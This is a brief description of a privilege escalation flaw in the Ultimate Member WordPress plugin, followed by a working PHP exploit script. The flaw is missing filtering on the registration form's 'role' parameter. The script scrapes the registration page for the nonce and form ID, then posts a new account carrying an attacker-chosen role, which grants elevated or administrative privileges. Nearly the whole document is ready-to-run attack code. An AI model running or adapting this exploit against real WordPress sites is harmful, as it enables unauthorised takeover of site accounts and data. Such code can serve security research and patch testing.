Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges.
<?php
// Settings
$wp_url = $argv[1];
$username = $argv[2];
$name = $argv[3];
$lastname = $argv[4];
$email = $argv[5];
$um_role = $argv[6];
// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];
// Pull the form_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
preg_match('/id=\"form_id_([^"]+)"/', $content, $matches);
$form_id = $matches[1];
// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/register');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'user_login-' . $form_id => $username,
'first_name-'. $form_id => $name,
'last_name-' . $form_id => $lastname,
'user_email-' . $form_id => $email,
'user_password-' . $form_id => 'StrongPassword123!',
'confirm_user_password-' . $form_id => 'StrongPassword123!',
'role' => $um_role,
'form_id' => $form_id,
'timestamp' => '1603399250',
'um_request' => '',
'_wpnonce' => $nonce,
'_wp_http_referer' => 'register'
]);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>